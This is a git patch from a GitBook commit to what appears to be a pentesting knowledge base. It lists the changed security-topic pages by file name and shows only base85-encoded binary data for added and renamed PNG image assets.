From 53db995b8672451eb87a7b5f7b258ef39f3a8c9b Mon Sep 17 00:00:00 2001 From: CPol Date: Fri, 8 Oct 2021 09:38:39 +0000 Subject: [PATCH] GitBook: [master] 10 pages and 4 assets modified --- ...2616e67655f696d672e706e67 (6) (4) (13).png | Bin 0 -> 1502 bytes .../{image (623).png => image (618) (2).png} | Bin .gitbook/assets/image (621) (1) (1).png | Bin 0 -> 24748 bytes .../linux-exploiting-basic-esp/README.md | 66 +++++++++--------- .../format-strings-template.md | 4 +- .../linux-privilege-escalation-checklist.md | 2 +- pentesting-methodology.md | 2 +- pentesting-web/cache-deception.md | 8 ++- .../xss-cross-site-scripting/README.md | 2 + pentesting-web/xxe-xee-xml-external-entity.md | 41 +++++++++++ pentesting/pentesting-web/graphql.md | 29 ++++---- .../active-directory-methodology/README.md | 2 +- .../checklist-windows-privilege-escalation.md | 2 +- 13 files changed, 99 insertions(+), 59 deletions(-) create mode 100644 .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png rename .gitbook/assets/{image (623).png => image (618) (2).png} (100%) create mode 100644 .gitbook/assets/image (621) (1) (1).png 
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png new file mode 100644 index 0000000000000000000000000000000000000000..4c4968b48f0ebf20a73e46cd07c9315dc629c00c GIT binary patch literal 1502 zcmV<41tI#0P)O}P0RNd|v9YnQudnZ?9RH*M z|B+Y!p8)@kQ~!)n|BO%nn*jfdPXCHc|A|chiA(>8O82_ME`?B|ARvR zf5yUXqm38Abi#$x94+_wSpM&m`*Z*GIHFl|p&O65#5k%QvJu2Y>v!(8I?EcNQZGLg~u( zv^h#zNhUuw>eb0)vL$Kn+gBEP^N0JRA$h;q;whs#8mWb2qi#)Zd^(YIe>y^a`_XhX z1bp3CPTLQ1q7<>mM!huo?Bj`~dwZ`gP(S!{=Lo8#cziqP;&YNE9$6TOQawbVjh&S|SSUIvc>`V@ND4iwhrCk_rd{R$*KSDKnf*tjSm09Qp;n+!g0?1?l!iD*as#*m zFr7LB^JMV=6#Y%WKvZi0sN;YdB-H>h0fd!ib#wOK#gVr6$Edw(IV#l{6_k?7AaNsb`N5=vr;YmR}c{fmsWy|;K$fpN}4G(>rv z42{$o%6Za}h5iAO)k$-YYq97tA)A)DH({exg@A1k5z&s3zQ19N+4OBRM4YJ@&q-2wUkl| zQ7Qq`s?RddD%9J%W7OGKy0Ud`Zq-pzmy_em`J>Y5s zrqQenSPoR1HAcEk|vu zPWtV;;jDV=r|HVWGnr==Fl~~$x^9nEtwc|O>kLv`HJy~|I<2Z#9YLBt7*OANbZ_NE z9&1llYdKZOq+)$8>i)c{+FLnKee&Oe&VX0F z^gXB22=cwBo`^L@No`!x7+I(G+B!8Y*Qgb|HVyWF0T{|tnTG-h82|tP07*qoM6N<$ Ef}*3!D*ylh literal 0 HcmV?d00001 diff --git a/.gitbook/assets/image (623).png b/.gitbook/assets/image (618) (2).png similarity index 100% rename from .gitbook/assets/image (623).png rename to .gitbook/assets/image (618) (2).png 
diff --git a/.gitbook/assets/image (621) (1) (1).png b/.gitbook/assets/image (621) (1) (1).png new file mode 100644 index 0000000000000000000000000000000000000000..e2fc218f93b676924af7036ac432223c364206d5 GIT binary patch literal 24748 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 
